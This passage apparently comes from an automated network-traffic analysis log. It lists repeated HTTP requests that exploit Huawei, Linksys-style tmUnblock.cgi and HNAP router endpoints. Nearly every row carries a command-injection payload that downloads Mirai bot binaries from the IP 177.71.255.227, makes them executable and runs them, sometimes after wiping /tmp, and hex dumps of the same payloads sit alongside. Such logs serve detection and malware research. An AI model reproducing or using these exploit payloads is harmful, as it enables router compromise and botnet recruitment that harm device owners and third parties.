s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
